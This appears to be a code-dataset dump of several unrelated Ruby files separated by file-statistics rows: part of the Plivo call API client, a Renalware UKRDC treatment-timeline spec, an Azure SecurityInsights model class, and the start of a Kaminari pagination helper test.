                  [String, Symbol], true, %w[MAN WOMAN])
    params[:voice] = options[:voice]
  end
  if options.key?(:legs) &&
     valid_param?(:legs, options[:legs],
                  [String, Symbol], true, %w[aleg bleg both])
    params[:legs] = options[:legs]
  end
  %i[loop mix].each do |param|
    if options.key?(param) &&
       valid_param?(param, options[param], [TrueClass, FalseClass], true)
      params[param] = options[param]
    end
  end
  perform_action('Speak', 'POST', params, true)
end
# Stops any text-to-speech currently playing on this call.
def stop_speak
  perform_action('Speak', 'DELETE', nil, false)
end
# Sends DTMF digits on this call. leg, when given, selects which side of
# the call receives the tones ('aleg', 'bleg' or 'both').
def send_digits(digits, leg = nil)
  valid_param?(:digits, digits, String, true)
  params = { digits: digits }
  unless leg.nil?
    valid_param?(:leg, leg, [String, Symbol], true, %w[aleg bleg both])
    params[:leg] = leg
  end
  perform_action('DTMF', 'POST', params, true)
end
# Cancels an outbound call request by hitting the corresponding
# /Request/ endpoint (the call's URI with 'Call' swapped for 'Request').
def cancel_request
  resource_path = @_resource_uri.sub('Call', 'Request')
  @_client.send_request(resource_path, 'DELETE', nil)
end
def to_s
call_details = {
answer_time: @answer_time,
api_id: @api_id,
bill_duration: @bill_duration,
billed_duration: @billed_duration,
call_direction: @call_direction,
call_duration: @call_duration,
call_status: @call_status,
call_uuid: @call_uuid,
end_time: @end_time,
from_number: @from_number,
initiation_time: @initiation_time,
parent_call_uuid: @parent_call_uuid,
hangup_cause_code: @hangup_cause_code,
hangup_cause_name: @hangup_cause_name,
hangup_source: @hangup_source,
resource_uri: @resource_uri,
to_number: @to_number,
total_amount: @total_amount,
total_rate: @total_rate,
to: @to,
from: @from,
request_uuid: @request_uuid,
direction: @direction,
caller_name: @caller_name
}
call_details = call_details.select {|k, v| !v.nil? }
call_details.to_s
end
end
class CallInterface < Base::ResourceInterface
# Wires this interface to the /Call/ collection endpoint.
def initialize(client, resource_list_json = nil)
  @_name = 'Call'
  @_resource_type = Call
  @_identifier_string = 'call_uuid'
  super
end
##
# Makes an outbound call
#
# @param [String] from
# @param [Array] to
# @param [String] answer_url
# @param [String] answer_method
# @param [Hash] options
# @option options [String] :answer_method - The method used to call the answer_url. Defaults to POST.
# @option options [String] :ring_url - The URL that is notified by Plivo when the call is ringing. Defaults not set.
# @option options [String] :ring_method - The method used to call the ring_url. Defaults to POST.
# @option options [String] :hangup_url - The URL that will be notified by Plivo when the call hangs up. Defaults to answer_url.
# @option options [String] :hangup_method - The method used to call the hangup_url. Defaults to POST.
# @option options [String] :fallback_url - Invoked by Plivo only if answer_url is unavailable or the XML response is invalid. Should contain a XML response.
# @option options [String] :fallback_method - The method used to call the fallback_answer_url. Defaults to POST.
# @option options [String] :caller_name - Caller name to use with the call.
# @option options [String] :send_digits - Plivo plays DTMF tones when the call is answered. This is useful when dialing a phone number and an extension. Plivo will dial the number, and when the automated system picks up, sends the DTMF tones to connect to the extension. E.g. If you want to dial the 2410 extension after the call is connected, and you want to wait for a few seconds before sending the extension, add a few leading 'w' characters. Each 'w' character waits 0.5 second before sending a digit. Each 'W' character waits 1 second before sending a digit. You can also add the tone duration in ms by appending @duration after the string (default duration is 2000 ms). For example, 1w2w3@1000 See the DTMF API for additional information.
# @option options [Boolean] :send_on_preanswer - If set to true and send_digits is also set, digits are sent when the call is in preanswer state. Defaults to false.
# @option options [Int] :time_limit - Schedules the call for hangup at a specified time after the call is answered. Value should be an integer > 0(in seconds).
# @option options [Int] :hangup_on_ring - Schedules the call for hangup at a specified time after the call starts ringing. Value should be an integer >= 0 (in seconds).
# @option options [String] :machine_detection - Used to detect if the call has been answered by a machine. The valid values are true and hangup. Default time to analyze is 5000 milliseconds (or 5 seconds). You can change it with the machine_detection_time parameter. Note that no XML is processed during the analysis phase. If a machine is detected during the call and machine_detection is set to true, the Machine parameter will be set to true and will be sent to the answer_url, hangup_url, or any other URL that is invoked by the call. If a machine is detected during the call and machine_detection is set to hangup, the call hangs up immediately and a request is made to the hangup_url with the Machine parameter set to true
# @option options [Int] :machine_detection_time - Time allotted to analyze if the call has been answered by a machine. It should be an integer >= 2000 and <= 10000 and the unit is ms. The default value is 5000 ms.
# @option options [String] :machine_detection_url - A URL where machine detection parameters will be sent by Plivo. This parameter should be used to make machine detection asynchronous
# @option options [String] :machine_detection_method - The HTTP method which will be used by Plivo to request the machine_detection_url. Defaults to POST.
# @option options [String] :sip_headers- List of SIP headers in the form of 'key=value' pairs, separated by commas. E.g. head1=val1,head2=val2,head3=val3,...,headN=valN. The SIP headers are always prefixed with X-PH-. The SIP headers are present for every HTTP request made by the outbound call. Only [A-Z], [a-z] and [0-9] characters are allowed for the SIP headers key and value. Additionally, the '%' character is also allowed for the SIP headers value so that you can encode this value in the URL.
# @option options [Int] :ring_timeout - Determines the time in seconds the call should ring. If the call is not answered within the ring_timeout value or the default value of 120s, it is canceled.
# @option options [String] :parent_call_uuid - The call_uuid of the first leg in an ongoing conference call. It is recommended to use this parameter in scenarios where a member who is already present in the conference intends to add new members by initiating outbound API calls. This minimizes the delay in adding a new memeber to the conference.
# @option options [Boolean] :error_parent_not_found - if set to true and the parent_call_uuid cannot be found, the API request would return an error. If set to false, the outbound call API request will be executed even if the parent_call_uuid is not found. Defaults to false.
# @return [Call] Call
def create(from, to, answer_url, answer_method = 'POST', options = nil)
  valid_param?(:from, from, [String, Symbol, Integer], true)
  valid_param?(:to, to, Array, true)
  to.each { |destination| valid_param?(:to_num, destination, [Integer, String, Symbol], true) }
  valid_param?(:answer_url, answer_url, [String, Symbol], true)
  valid_param?(:answer_method, answer_method, [String, Symbol], true, %w[GET POST])

  # Multiple destinations are joined with '<' per the Plivo bulk-call syntax.
  params = {
    from: from,
    to: to.join('<'),
    answer_url: answer_url,
    answer_method: answer_method
  }
  params = params.merge(options) unless options.nil?
  perform_create(params)
end
##
# Get details of a call
# @param [String] call_uuid
# Fetches the detail record for a call by its UUID.
def get(call_uuid)
  valid_param?(:call_uuid, call_uuid, [String, Symbol], true)
  perform_get(call_uuid)
end
# @param [String] call_uuid
# Fetches details of an ongoing (live) call.
# NOTE(review): unlike #get, call_uuid is not validated here - confirm
# whether that is intentional.
def get_live(call_uuid)
  perform_get(call_uuid, status: 'live')
end
# @param [String] call_uuid
# Fetches details of a call still waiting in the queue.
# NOTE(review): call_uuid is not validated here, unlike #get.
def get_queued(call_uuid)
  perform_get(call_uuid, status: 'queued')
end
# @param [Hash] options
# @option options [String] :subaccount - The id of the subaccount, if call details of the subaccount are needed.
# @option options [String] :call_direction - Filter the results by call direction. The valid inputs are inbound and outbound.
# @option options [String] :from_number - Filter the results by the number from where the call originated. For example:
# - To filter out those numbers that contain a particular number sequence, use from_number={ sequence}
# - To filter out a number that matches an exact number, use from_number={ exact_number}
# @option options [String] :to_number - Filter the results by the number to which the call was made. Tips to use this filter are:
# - To filter out those numbers that contain a particular number sequence, use to_number={ sequence}
# - To filter out a number that matches an exact number, use to_number={ exact_number}
# @option options [String] :bill_duration - Filter the results according to billed duration. The value of billed duration is in seconds. The filter can be used in one of the following five forms:
# - bill_duration: Input the exact value. E.g., to filter out calls that were exactly three minutes long, use bill_duration=180
# - bill_duration\__gt: gt stands for greater than. E.g., to filter out calls that were more than two hours in duration bill_duration\__gt=7200
# - bill_duration\__gte: gte stands for greater than or equal to. E.g., to filter out calls that were two hours or more in duration bill_duration\__gte=7200
# - bill_duration\__lt: lt stands for lesser than. E.g., to filter out calls that were less than seven minutes in duration bill_duration\__lt=420
# - bill_duration\__lte: lte stands for lesser than or equal to. E.g., to filter out calls that were two hours or less in duration bill_duration\__lte=7200
# @option options [String] :end_time - Filter out calls according to the time of completion. The filter can be used in the following five forms:
# - end_time: The format expected is YYYY-MM-DD HH:MM[:ss[.uuuuuu]]. E.g., To get all calls that ended at 2012-03-21 11:47[:30], use end_time=2012-03-21 11:47[:30]
# - end_time\__gt: gt stands for greater than. The format expected is YYYY-MM-DD HH:MM[:ss[.uuuuuu]]. E.g., To get all calls that ended after 2012-03-21 11:47, use end_time\__gt=2012-03-21 11:47
# - end_time\__gte: gte stands for greater than or equal. The format expected is YYYY-MM-DD HH:MM[:ss[.uuuuuu]]. E.g., To get all calls that ended after or exactly at 2012-03-21 11:47[:30], use end_time\__gte=2012-03-21 11:47[:30]
# - end_time\__lt: lt stands for lesser than. The format expected is YYYY-MM-DD HH:MM[:ss[.uuuuuu]]. E.g., To get all calls that ended before 2012-03-21 11:47, use end_time\__lt=2012-03-21 11:47
# - end_time\__lte: lte stands for lesser than or equal. The format expected is YYYY-MM-DD HH:MM[:ss[.uuuuuu]]. E.g., To get all calls that ended before or exactly at 2012-03-21 11:47[:30], use end_time\__lte=2012-03-21 11:47[:30]
# - Note: The above filters can be combined to get calls that ended in a particular time range. The timestamps need to be UTC timestamps.
# @option options [String] :parent_call_uuid - Filter the results by parent call uuid.
# @option options [String] :hangup_source - Filter the results by hangup source
# @option options [String] :hangup_cause_code - Filter the results by hangup cause code
# @option options [Int] :limit - Used to display the number of results per page. The maximum number of results that can be fetched is 20.
# @option options [Int] :offset - Denotes the number of value items by which the results should be offset. E.g., If the result contains a 1000 values and limit is set to 10 and offset is set to 705, then values 706 through 715 are displayed in the results. This parameter is also used for pagination of the results.
# Lists completed calls, filtered by the validated options documented
# above. Returns the result of perform_list (a page hash containing the
# matching call objects).
def list(options = nil)
  return perform_list if options.nil?
  valid_param?(:options, options, Hash, true)
  params = {}
  params_expected = %i[
    subaccount bill_duration bill_duration__gt bill_duration__gte
    bill_duration__lt bill_duration__lte end_time end_time__gt
    end_time__gte end_time__lt end_time__lte parent_call_uuid hangup_source
  ]
  params_expected.each do |param|
    if options.key?(param) &&
       valid_param?(param, options[param], [String, Symbol], true)
      params[param] = options[param]
    end
  end
  if options.key?(:call_direction) &&
     valid_param?(:call_direction, options[:call_direction],
                  [String, Symbol], true, %w[inbound outbound])
    params[:call_direction] = options[:call_direction]
  end
  %i[offset limit hangup_cause_code].each do |param|
    # Was `[Integer, Integer]` - a duplicated class apparently left over
    # from the pre-Ruby-2.4 `[Integer, Fixnum]` pair; a single Integer
    # check is equivalent and matches the style used elsewhere.
    if options.key?(param) && valid_param?(param, options[param], Integer, true)
      params[param] = options[param]
    end
  end
  raise_invalid_request("Offset can't be negative") if options.key?(:offset) && options[:offset] < 0
  if options.key?(:limit) && (options[:limit] > 20 || options[:limit] <= 0)
    raise_invalid_request('The maximum number of results that can be '\
    "fetched is 20. limit can't be more than 20 or less than 1")
  end
  perform_list(params)
end
# Yields every call, transparently paging through results 20 at a time.
def each
  offset = 0
  loop do
    call_list = list(offset: offset)
    call_list[:objects].each { |call| yield call }
    offset += 20
    # Stop once a partial page comes back. The previous check compared
    # `call_list.length` (the number of keys in the page hash, a small
    # constant) with 20, so it never matched and iteration always stopped
    # after the first page.
    return if call_list[:objects].length < 20
  end
end
# @param [Hash] options
# @option options [String] :call_direction - Filter the results by call direction. The valid inputs are inbound and outbound.
# @option options [String] :from_number - Filter the results by the number from where the call originated. For example:
# - To filter out those numbers that contain a particular number sequence, use from_number={ sequence}
# - To filter out a number that matches an exact number, use from_number={ exact_number}
# @option options [String] :to_number - Filter the results by the number to which the call was made. Tips to use this filter are:
# - To filter out those numbers that contain a particular number sequence, use to_number={ sequence}
# - To filter out a number that matches an exact number, use to_number={ exact_number}
# Lists ongoing (live) calls, optionally filtered by from/to number and
# call direction. Returns a plain hash, not resource objects:
# { api_id:, calls: }.
def list_live(options = nil)
  if options.nil?
    options = {}
  else
    valid_param?(:options, options, Hash, true)
  end
  params = {}
  params[:status] = 'live'
  params_expected = %i[
    from_number to_number
  ]
  params_expected.each do |param|
    if options.key?(param) &&
       valid_param?(param, options[param], [String, Symbol], true)
      params[param] = options[param]
    end
  end
  if options.key?(:call_direction) &&
     valid_param?(:call_direction, options[:call_direction],
                  [String, Symbol], true, %w[inbound outbound])
    params[:call_direction] = options[:call_direction]
  end
  perform_list_without_object(params)
  # @api_id and @calls are populated as a side effect of the call above.
  {
    api_id: @api_id,
    calls: @calls
  }
end
# Lists calls currently waiting in the queue; returns { api_id:, calls: }.
# @api_id and @calls are populated by perform_list_without_object.
def list_queued
  perform_list_without_object(status: 'queued')
  {
    api_id: @api_id,
    calls: @calls
  }
end
# Yields each live call in turn (no pagination - single list_live page).
def each_live
  call_list = list_live
  call_list[:calls].each { |call| yield call }
end
# Yields each queued call in turn.
def each_queued
  call_queued = list_queued
  call_queued[:calls].each { |call| yield call}
end
##
# Transfer a call
# @param [String] call_uuid
# @param [Hash] details
# @option details [String] :legs - aleg, bleg or both Defaults to aleg. aleg will transfer call_uuid ; bleg will transfer the bridged leg (if found) of call_uuid ; both will transfer call_uuid and bridged leg of call_uuid
# @option details [String] :aleg_url - URL to transfer for aleg, if legs is aleg or both, then aleg_url has to be specified.
# @option details [String] :aleg_method - HTTP method to invoke aleg_url. Defaults to POST.
# @option details [String] :bleg_url - URL to transfer for bridged leg, if legs is bleg or both, then bleg_url has to be specified.
# @option details [String] :bleg_method - HTTP method to invoke bleg_url. Defaults to POST.
# @return [Call] Call
# Transfers a live call (see the option docs above); delegates to
# Call#update on a lazily-built resource wrapper.
def update(call_uuid, details)
  valid_param?(:call_uuid, call_uuid, [String, Symbol], true)
  Call.new(@_client, resource_id: call_uuid).update(details)
end
# @param [String] call_uuid
# Deletes the call resource identified by call_uuid.
def delete(call_uuid)
  valid_param?(:call_uuid, call_uuid, [String, Symbol], true)
  Call.new(@_client, resource_id: call_uuid).delete
end
# @param [String] call_uuid
# @param [Hash] options
# @option options [Int] :time_limit - Max recording duration in seconds. Defaults to 60.
# @option options [String] :file_format - The format of the recording. The valid formats are mp3 and wav formats. Defaults to mp3.
# @option options [String] :transcription_type - The type of transcription required. The following values are allowed:
# - auto - This is the default value. Transcription is completely automated; turnaround time is about 5 minutes.
# - hybrid - Transcription is a combination of automated and human verification processes; turnaround time is about 10-15 minutes.
# - *Our transcription service is primarily for the voicemail use case (limited to recorded files lasting for up to 2 minutes). Currently the service is available only in English and you will be charged for the usage. Please check out the price details.
# @option options [String] :transcription_url - The URL where the transcription is available.
# @option options [String] :transcription_method - The method used to invoke the transcription_url. Defaults to POST.
# @option options [String] :callback_url - The URL invoked by the API when the recording ends. The following parameters are sent to the callback_url:
# - api_id - the same API ID returned by the call record API.
# - record_url - the URL to access the recorded file.
# - call_uuid - the call uuid of the recorded call.
# - recording_id - the recording ID of the recorded call.
# - recording_duration - duration in seconds of the recording.
# - recording_duration_ms - duration in milliseconds of the recording.
# - recording_start_ms - when the recording started (epoch time UTC) in milliseconds.
# - recording_end_ms - when the recording ended (epoch time UTC) in milliseconds.
# @option options [String] :callback_method - The method which is used to invoke the callback_url URL. Defaults to POST.
# Starts recording the given call; options (documented above) are
# validated in Call#record.
def record(call_uuid, options = nil)
  valid_param?(:call_uuid, call_uuid, [String, Symbol], true)
  Call.new(@_client, resource_id: call_uuid).record(options)
end
# @param [String] call_uuid
# @param [String] url - You can specify a record URL to stop only one record. By default all recordings are stopped.
# Stops recording on the given call; with a record URL only that
# recording is stopped, otherwise all recordings stop.
def stop_record(call_uuid, url = nil)
  valid_param?(:call_uuid, call_uuid, [String, Symbol], true)
  Call.new(@_client, resource_id: call_uuid).stop_record(url)
end
# @param [String] call_uuid
# @param [Array] urls
# @param [Hash] options
# @option options [Array of strings] :urls - A single URL or a list of comma separated URLs linking to an mp3 or wav file.
# @option options [Int] :length - Maximum length in seconds that the audio should be played.
# @option options [String] :legs - The leg on which the music will be played, can be aleg (i.e., A-leg is the first leg of the call or current call), bleg (i.e., B-leg is the second leg of the call),or both (i.e., both legs of the call).
# @option options [Boolean] :loop - If set to true, the audio file will play indefinitely.
# @option options [Boolean] :mix - If set to true, sounds are mixed with current audio flow.
# Plays the given audio URLs on the call (see option docs above).
def play(call_uuid, urls, options = nil)
  valid_param?(:call_uuid, call_uuid, [String, Symbol], true)
  valid_param?(:urls, urls, Array, true)
  Call.new(@_client, resource_id: call_uuid).play(urls, options)
end
# @param [String] call_uuid
# Stops any audio playing on the given call.
def stop_play(call_uuid)
  valid_param?(:call_uuid, call_uuid, [String, Symbol], true)
  Call.new(@_client, resource_id: call_uuid).stop_play
end
# @param [String] call_uuid
# @param [String] text
# @param [Hash] options
# @option options [String] :voice - The voice to be used, can be MAN, WOMAN.
# @option options [Int] :language - The language to be used, see Supported voices and languages {https://www.plivo.com/docs/api/call/speak/#supported-voices-and-languages}
# @option options [String] :legs - The leg on which the music will be played, can be aleg (i.e., A-leg is the first leg of the call or current call), bleg (i.e., B-leg is the second leg of the call),or both (i.e., both legs of the call).
# @option options [Boolean] :loop - If set to true, the audio file will play indefinitely.
# @option options [Boolean] :mix - If set to true, sounds are mixed with current audio flow.
# Speaks text on the given call via TTS (see option docs above).
def speak(call_uuid, text, options = nil)
  valid_param?(:call_uuid, call_uuid, [String, Symbol], true)
  Call.new(@_client, resource_id: call_uuid).speak(text, options)
end
# @param [String] call_uuid
# Stops any text-to-speech playing on the given call.
def stop_speak(call_uuid)
  valid_param?(:call_uuid, call_uuid, [String, Symbol], true)
  Call.new(@_client, resource_id: call_uuid).stop_speak
end
# @param [String] call_uuid
# @param [String] digits - Digits to be sent.
# @param [String] leg - The leg to be used, can be aleg (the current call) or bleg (the other party in a Dial). Defaults to aleg.
# Sends DTMF digits on the given call; leg selects 'aleg' or 'bleg'.
def send_digits(call_uuid, digits, leg = nil)
  valid_param?(:call_uuid, call_uuid, [String, Symbol], true)
  Call.new(@_client, resource_id: call_uuid).send_digits(digits, leg)
end
# @param [String] call_uuid
# Cancels an unanswered outbound call request for the given call UUID.
def cancel_request(call_uuid)
  valid_param?(:call_uuid, call_uuid, [String, Symbol], true)
  Call.new(@_client, resource_id: call_uuid).cancel_request
end
end
end
end
| 53.329749 | 751 | 0.625815 |
18c93642b19bb8e5e894487f9e2876a34b59e226 | 11,118 | # frozen_string_literal: true
require "rails_helper"
# rubocop:disable RSpec/ExampleLength, Layout/LineLength, Style/WordArray
module Renalware
module UKRDC
describe TreatmentTimeline::HD::Generator do
include PatientsSpecHelper
subject(:generator) { described_class.new(modality) }
let(:user) { create(:user) }
let(:hd_ukrdc_modality_code) { create(:ukrdc_modality_code, :hd) }
let(:hdf_ukrdc_modality_code) { create(:ukrdc_modality_code, :hdf) }
let(:hd_mod_desc) { create(:hd_modality_description) }
let(:patient) { create(:patient) }
let(:modality) do
set_modality(
patient: patient,
modality_description: hd_mod_desc,
by: user
)
end
# Builds an HD profile for the shared `patient` via FactoryBot.
# `start_date`/`end_date` map onto created_at/deactivated_at, `hd_type` is
# passed as a factory trait (e.g. :hdf_pre), and any extra attributes in
# `args` override the defaults below.
def create_profile(start_date:, end_date: nil, hd_type: :hd, active: true, **args)
  defaults = {
    patient: patient,
    created_at: start_date,
    deactivated_at: end_date,
    active: active
  }
  create(:hd_profile, hd_type, **defaults.merge(args))
end
before do
hd_ukrdc_modality_code
hdf_ukrdc_modality_code
end
context "when the patient has the HD modality" do
let(:patient) { create(:hd_patient) }
context "when they have no HD profile" do
it "creates one Treatment with a generic UKRDC treatment code of HD" do
expect {
generator.call
}.to change(UKRDC::Treatment, :count).by(1)
expect(UKRDC::Treatment.first).to have_attributes(
patient_id: patient.id,
hd_profile_id: nil,
modality_code: hd_ukrdc_modality_code,
modality_description_id: hd_mod_desc.id,
started_on: modality.started_on,
ended_on: modality.ended_on,
modality_id: modality.id
)
end
end
context "when they have an HD Profile active at the point of modality creation" do
it "creates uses the regime type when creating the Treatment" do
create_profile(start_date: 5.years.ago, end_date: nil, hd_type: :hdf_pre)
expect {
generator.call
}.to change(UKRDC::Treatment, :count).by(1)
expect(UKRDC::Treatment.first).to have_attributes(
modality_code: hdf_ukrdc_modality_code
)
end
end
context "when they have an HD Profile created within 100yrs of the modality start date" do
it "finds this initial profile, regardless of how far in the future it is, and "\
"uses its type etc when creating the Treatment" do
create_profile(start_date: Time.zone.now + 99.years, end_date: nil, hd_type: :hdf_pre)
expect {
generator.call
}.to change(UKRDC::Treatment, :count).by(1)
expect(UKRDC::Treatment.first).to have_attributes(
modality_code: hdf_ukrdc_modality_code
)
end
end
context "when 2 HD profiles (HDF then HD) created after the modality start date" do
it "uses the first for the initial Treatment and creates "\
"a futher Treatment to register the change from HDF to HD" do
# The first profile - this will be associated with the modality when creating
# the first treatment record - is the treatment record will use its HD type etc
unit = create(:hospital_unit)
# this will be their current modality as it is the only one and has no ended_on
modality1 = set_modality(
patient: patient,
modality_description: hd_mod_desc,
by: user,
started_on: "2017-01-01"
)
# SQL View will find this and use data in here for hd_type and unit in the first
# treatment (created for the modality). It won't trigger a new treatment as its data
# has been applied to the first treatment
create_profile(
start_date: "2018-01-01",
end_date: "2019-01-01",
hd_type: :hdf_pre,
hospital_unit: unit,
active: false
)
# should create another treatment based on this as hd type has changed
# provided it thinks it is within the range from..to in ProfilesInDateRangeQuery
# this is complicated by the fact it has a nil end_date...
last_hd_profile = create_profile(
start_date: "2019-01-01",
end_date: nil, # current
hd_type: :hd
)
expect {
described_class.new(modality1).call
}.to change(UKRDC::Treatment, :count).by(2)
treatments = UKRDC::Treatment.order(started_on: :asc)
expect(treatments[0]).to have_attributes(
modality_code: hdf_ukrdc_modality_code,
started_on: modality1.started_on,
ended_on: last_hd_profile.created_at.to_date
)
expect(treatments[1]).to have_attributes(
modality_code: hd_ukrdc_modality_code,
started_on: last_hd_profile.created_at.to_date,
ended_on: nil
)
end
end
describe "patient has 4 HD modalities in the past but only much newer HD profiles" do
# Based on 133651
it "uses the first found hd profile in order to resolve the unit id" do
modal1 = set_modality(
patient: patient,
modality_description: hd_mod_desc,
by: user,
started_on: "2017-06-21"
)
modal2 = set_modality(
patient: patient,
modality_description: hd_mod_desc,
by: user,
started_on: "2017-08-10"
)
modal3 = set_modality(
patient: patient,
modality_description: hd_mod_desc,
by: user,
started_on: "2017-11-14"
)
modal4 = set_modality(
patient: patient,
modality_description: hd_mod_desc,
by: user,
started_on: "2017-12-02"
)
unit1 = create(:hospital_unit)
unit2 = create(:hospital_unit)
# 3 HD profiles but all created on the same day so the last one is the 'effective' one
# But note they are not 'in range' of any HD modality so count for nothing
create_profile(
start_date: "2018-03-08 18:00:14.760431", # created_at
end_date: "2018-03-12 11:20:39.431778", # deactivated_at
hd_type: :hd,
active: nil,
prescribed_on: nil,
hospital_unit: unit1,
prescribed_time: 210
)
create_profile(
start_date: "2018-03-12 11:20:39.443311", # created_at
end_date: nil, # deactivated_at
hd_type: :hd,
active: true,
prescribed_on: nil,
hospital_unit: unit2,
prescribed_time: 210
)
expect {
described_class.new(modal1.reload).call
described_class.new(modal2.reload).call
described_class.new(modal3.reload).call
described_class.new(modal4.reload).call
}.to change(UKRDC::Treatment, :count).by(5)
treatments = UKRDC::Treatment.all
# The SQL view hd_profile_for_modalities will find the first HD Profile
# and takes its hospital unit id. No other modalities define in their window
# a new HD profile that would change the unit id (or hd type)
expect(treatments.map(&:hospital_unit_id).uniq).to eq [unit1.id, unit2.id]
expect(treatments.map(&:hd_type).uniq).to eq ["hd"]
end
end
describe "patient has 4 HD modalities and 3 HD profiles" do
it "uses the first found hd profile in order to resolve the unit id "\
"and creates two more treatments for the profile changes" do
units = [create(:hospital_unit), create(:hospital_unit)]
modality_start_dates = [
"2016-01-01",
"2017-01-01",
"2018-01-01",
"2019-01-01"
]
modalities = modality_start_dates.map do |date|
set_modality(
patient: patient,
modality_description: hd_mod_desc,
by: user,
started_on: date
)
end
# First profile is a year after the first modality, but it is found and used by
# modality[0]. The profile lasts for 1 month then another is created
profiles_definitions = [
# start_date, end_date, hd_type, unit
["2017-02-01", "2017-03-01", :hd, units.first],
["2017-03-01", "2017-04-01", :hdf_pre, units.first], # hd_type changes
["2017-04-01", nil, :hdf_pre, units.last] # unit changes NB deactivated_at = nil as current profile
]
profiles_definitions.each do |defn|
create_profile(
start_date: defn[0], # created_at
end_date: defn[1], # deactivated_at
hd_type: defn[2],
active: defn[1].nil? ? true : nil,
prescribed_on: nil,
hospital_unit: defn[3],
prescribed_time: 210
)
end
expect {
modalities.each do |modality|
described_class.new(modality.reload).call
end
}.to change(UKRDC::Treatment, :count).by(6)
treatments = UKRDC::Treatment.all.order(:started_on)
expected = [
# started_on, ended_on, hd_type, unit
["2016-01-01", "2017-01-01", "hd", units[0]], # modality[0]
["2017-01-01", "2017-03-01", "hd", units[0]], # modality[1] - ends early due to hd_profile change
["2017-03-01", "2017-04-01", "hdf_pre", units[0]], # triggered by hd_type change in profile
["2017-04-01", "2018-01-01", "hdf_pre", units[1]], # triggered by unit change in profile,
["2018-01-01", "2019-01-01", "hdf_pre", units[1]], # modality[3],
["2019-01-01", nil, "hdf_pre", units[1]] # modality[4]
]
expected.each_with_index do |row, index|
expect(treatments[index]).to have_attributes(
started_on: Date.parse(row[0]),
ended_on: row[1] && Date.parse(row[1]),
hd_type: row[2], # from 1st hd profile
hospital_unit: row[3]
)
end
end
end
end
end
end
end
# rubocop:enable RSpec/ExampleLength, Layout/LineLength, Style/WordArray
| 38.337931 | 125 | 0.555226 |
e838ca510e817f27794d21531fddbd18c955fc20 | 1,611 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::SecurityInsights::Mgmt::V2019_01_01_preview
module Models
#
# Describes a threat intelligence ARM STIX sort-by clause.
# NOTE: auto-generated by AutoRest — manual edits may be lost on regeneration.
#
class ThreatIntelligenceArmStixSortBy1
  include MsRestAzure

  # @return [String] Item key to sort on.
  attr_accessor :item_key

  # @return [String] Sort order. Possible values include: 'unsorted',
  #   'ascending', 'descending'. Serialized as a plain string (see mapper),
  #   despite the ThreatIntelligenceArmStixSortBy enum name.
  attr_accessor :sort_order


  #
  # Mapper for ThreatIntelligenceArmStixSortBy1 class as Ruby Hash.
  # This will be used for serialization/deserialization.
  #
  def self.mapper()
    {
      client_side_validation: true,
      required: false,
      serialized_name: 'ThreatIntelligenceArmStixSortBy',
      type: {
        name: 'Composite',
        class_name: 'ThreatIntelligenceArmStixSortBy1',
        model_properties: {
          item_key: {
            client_side_validation: true,
            required: false,
            serialized_name: 'itemKey',
            type: {
              name: 'String'
            }
          },
          sort_order: {
            client_side_validation: true,
            required: false,
            serialized_name: 'sortOrder',
            type: {
              name: 'String'
            }
          }
        }
      }
    }
  end
end
end
end
| 27.305085 | 77 | 0.556797 |
f75bd96f37ff40b430d9c7354a7109961503bd06 | 27 | module ChampionsHelper
end
| 9 | 22 | 0.888889 |
61601586537d4d8127df195b18ee0ead767a564d | 21,034 | # frozen_string_literal: true
require 'test_helper'
if defined?(::Rails::Railtie) && defined?(::ActionView)
class ActionViewExtensionTest < ActionView::TestCase
setup do
self.output_buffer = ::ActionView::OutputBuffer.new
I18n.available_locales = [:en, :de, :fr]
I18n.locale = :en
end
teardown do
User.delete_all
end
sub_test_case '#paginate' do
setup do
50.times {|i| User.create! name: "user#{i}"}
end
test 'returns a String' do
users = User.page(1)
assert_kind_of String, view.paginate(users, params: {controller: 'users', action: 'index'})
end
test 'escaping the pagination for javascript' do
users = User.page(1)
assert_nothing_raised do
escape_javascript(view.paginate users, params: {controller: 'users', action: 'index'})
end
end
test 'allows for overriding params with the :params option' do
view.params[:controller], view.params[:action] = 'addresses', 'new'
users = User.page(1)
assert_match '/users?page=2', view.paginate(users, params: { controller: 'users', action: 'index' })
end
test 'accepts :theme option' do
users = User.page(1)
begin
controller.append_view_path File.join(Gem.loaded_specs['kaminari-core'].gem_dir, 'test/fake_app/views')
html = view.paginate users, theme: 'bootstrap', params: {controller: 'users', action: 'index'}
assert_match(/bootstrap-paginator/, html)
assert_match(/bootstrap-page-link/, html)
ensure
controller.view_paths.pop
end
end
test 'accepts :views_prefix option' do
users = User.page(1)
begin
controller.append_view_path File.join(Gem.loaded_specs['kaminari-core'].gem_dir, 'test/fake_app/views')
assert_equal " <b>1</b>\n", view.paginate(users, views_prefix: 'alternative/', params: {controller: 'users', action: 'index'})
ensure
controller.view_paths.pop
end
end
test 'accepts :paginator_class option' do
users = User.page(1)
custom_paginator = Class.new(Kaminari::Helpers::Paginator) do
def to_s
"CUSTOM PAGINATION"
end
end
assert_equal 'CUSTOM PAGINATION', view.paginate(users, paginator_class: custom_paginator, params: {controller: 'users', action: 'index'})
end
test 'total_pages: 3' do
users = User.page(1)
assert_match(/<a href="\/users\?page=3">Last/, view.paginate(users, total_pages: 3, params: {controller: 'users', action: 'index'}))
end
test "page: 20 (out of range)" do
users = User.page(20)
html = view.paginate users, params: {controller: 'users', action: 'index'}
assert_not_match(/Last/, html)
assert_not_match(/Next/, html)
end
end
sub_test_case '#link_to_previous_page' do
setup do
60.times {|i| User.create! name: "user#{i}"}
end
sub_test_case 'having previous pages' do
test 'the default behaviour' do
users = User.page(3)
html = view.link_to_previous_page users, 'Previous', params: {controller: 'users', action: 'index'}
assert_match(/page=2/, html)
assert_match(/rel="prev"/, html)
html = view.link_to_previous_page users, 'Previous', params: {controller: 'users', action: 'index'} do 'At the Beginning' end
assert_match(/page=2/, html)
assert_match(/rel="prev"/, html)
end
test 'overriding rel=' do
users = User.page(3)
assert_match(/rel="external"/, view.link_to_previous_page(users, 'Previous', rel: 'external', params: {controller: 'users', action: 'index'}))
end
test 'with params' do
users = User.page(3)
params[:status] = 'active'
assert_match(/status=active/, view.link_to_previous_page(users, 'Previous', params: {controller: 'users', action: 'index'}))
end
end
test 'the first page' do
users = User.page(1)
assert_nil view.link_to_previous_page(users, 'Previous', params: {controller: 'users', action: 'index'})
assert_equal 'At the Beginning', (view.link_to_previous_page(users, 'Previous', params: {controller: 'users', action: 'index'}) do 'At the Beginning' end)
end
test 'out of range' do
users = User.page(5)
